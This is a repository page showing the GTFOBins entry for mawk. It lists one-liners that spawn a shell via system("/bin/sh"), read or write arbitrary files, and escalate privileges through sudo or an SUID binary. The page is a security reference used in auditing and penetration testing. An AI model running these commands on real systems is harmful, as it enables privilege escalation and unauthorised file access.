This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
78eae09003ba64917ca396d4655a21df6ec79e00
GTFOBins.github.io
/
_gtfobins
/
mawk.md
Andrea Cardaci
b5444fba6e
Remove network shell functions from mawk as not supported
2019-08-30 15:48:07 +02:00
393 B
Raw
Blame
History
functions
functions
shell
file-write
file-read
sudo
limited-suid
code
mawk 'BEGIN {system("/bin/sh")}'
code
LFILE=file_to_write mawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
code
LFILE=file_to_read mawk '//' "$LFILE"
code
sudo mawk 'BEGIN {system("/bin/sh")}'
code
./mawk 'BEGIN {system("/bin/sh")}'
Reference in New Issue
View Git Blame
Copy Permalink